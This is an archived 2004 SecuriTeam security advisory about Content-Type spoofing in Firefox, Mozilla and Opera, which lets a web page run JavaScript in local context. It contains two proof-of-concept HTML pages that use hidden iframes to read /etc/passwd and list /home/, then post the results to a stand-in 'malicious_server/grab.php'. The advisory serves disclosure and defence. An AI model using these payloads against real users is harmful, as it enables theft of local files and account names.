[NEWS] Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass Security Restrictions

From: SecuriTeam (support_at_securiteam.com)
Date: 12/16/04

Next message: SecuriTeam: "[NEWS] Roxio Toast Format String Vulnerability"

Previous message: SecuriTeam: "[UNIX] Blog Torrent Arbitrary File Downloading"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 16 Dec 2004 14:50:52 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass
Security Restrictions
------------------------------------------------------------------------

SUMMARY

A problem exists in some browsers where it is possible by a Content-Type
spoofing to "force" the target user to open a page and bypass the security
zone and execute JavaScript in local context.

DETAILS

Browsers tested:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.54 (*)
* Konqueror version 3.3.1
* Epiphany
* Internet Explorer version 6 with SP1
* Internet Explorer version 6 with SP1 + SP2

Browsers affected:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.51 up to version 7.54 (inclusive)

When the user "victim" visits http://malicious_server/paage.html, if
malicious_server responds with a page containing an unknown Content-Type
field (for example text/html., note the dot at the end of the file), the
browser will show a dialog window with some options (open, save, cancel).
Choosing "Open" to view this page, it will be downloaded and opened in
local ; JavaScript code will be executed in local context. Obviously, if
the user chooses to save and open it after the result is equal.

Giovanni tested this with some browsers but it seems that only Mozilla
Firefox and Opera(*) are exploitable in this mode.

(*) For Opera, this method of exploitation requires that opera must be set
as Default Application in "handler for saved files" in case the user
chooses "Open" in the dialog window.

Impact:
It could allow remote users to:

* Obtain the content of /home/ directory ( or c:\Documents and Settings\
for windows systems ) and therefore gather a set of usernames present on
the target system

* Know if a particular program is installed on the target system for a
successive attack

* Read the content of confidential files

* Read the browser's cache

In opera it is located in ~/.opera/cache4, instead in Mozilla Firefox it's
in /.mozilla/firefox/$RANDOM-STRING.default/Cache. Since it is possible to
enumerate the directory structure , a malicious user could easily know the
path to firefox's cache.

Proof of concept:
The following PoCs are exploit the Linux version of Firefox and Opera, but
they can be also applied to Windows versions. In order to test
Content-Type spoofing Giovanni has modified an open source web server to
make it respond with a spoofed Content-Type.

Read a local file utilizing inner.HTML method:
< HTML>
< BODY onLoad="ReadFileContent()" >
< iframe name="local_file" src="file:///etc/passwd" height=0
width=0></iframe>
< form name="module" method="post"
action="http://malicious_server/grab.php" ENCTYPE="text/plain">
< input name="content" type="hidden" size="300" >
</form>

< script>
function ReadFileContent(){
alert(local_file.document.all(0).innerHTML);
document.module.content.value+=local_file.document.firstChild.innerHTML;
//send content to malicious_server
document.module.submit();
}
</script>
</body>
</html>

(*) works with Firefox, with Opera it works only if a file has a .htm or
HTML extension.

List the directory structure:
< html>
< body onLoad="
for(i=0;i<local_files.document.links.length;i++)
{document.module.content.value+=local_files.document.links.item(i);}
alert(document.module.content.value);
//send list_files at malicious_server
document.module.submit();
">
< form name="module" method="post"
action="http://malicious_server/grab.php" ENCTYPE="text/plain">
< input name="content" type="hidden" size="300" >
</form>
< iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>

Vendor status:
24th November 2004: Giovanni has contacted mozilla by security@mozilla.org
and Opera by its bug track page at <https://bugs.opera.com/wizard/>
https://bugs.opera.com/wizard/.

Response from Mozilla
<https://bugzilla.mozilla.org/show_bug.cgi?id=273419>
https://bugzilla.mozilla.org/show_bug.cgi?id=273419:

"The problem is that Mozila utilizes the mime-type for served HTTP
documents but it does use the extension for opening local files. To
workaround this, you should disable the "open with" option. This would
move the "who is to blame" around to the user because he has to go through
the OS Filemanager to open it."

ADDITIONAL INFORMATION

The information has been provided by <mailto:badpenguin@zone-h.org>
Giovanni Delvecchio.
The original article can be found at:
<http://www.zone-h.org/en/advisories/read/id=6502/>
http://www.zone-h.org/en/advisories/read/id=6502/

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NEWS] Roxio Toast Format String Vulnerability"

Previous message: SecuriTeam: "[UNIX] Blog Torrent Arbitrary File Downloading"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Browsers browsers
... ive been using firefox for about the same amount of time as i have IE ... MSFT
to remove IE from the OS integration and just let us use Windows ... mozilla has
never claimed their software is perfect, ... "Security, cool features of FireFox Web Browser
beat Microsoft's IE". ... (microsoft.public.scripting.jscript)
Re: Debian, Iceweasle, Firefox!
... Iceweasel isn't real Firefox. ... at Mozilla and write them and angry
mail instead. ... Debian policy requires that all packages be built on Debian ...
releases (that means backporting security fixes) ... (Debian-User)
Re: Debian, Iceweasle, Firefox!
... at Mozilla and write them and angry mail instead. ... using the Firefox
name and logo requires the distributor to use the ... Debian policy requires that all packages
be built on Debian ... releases (that means backporting security fixes) ... (Debian-User)
Troubling security news for sarge users of mozilla, firefox, thunderbird...
... > not possible to support Mozilla, Thunderbird, Firefox (and probably ...
(in terms of fixing security related ... (Debian-User)
[SLE] Browser security -> new releases
... that a YOU-update for the above browsers ... after a single security fix
would be useless; ... which includes FireFox as well, I wonder if something like that for
Opera ... (SuSE)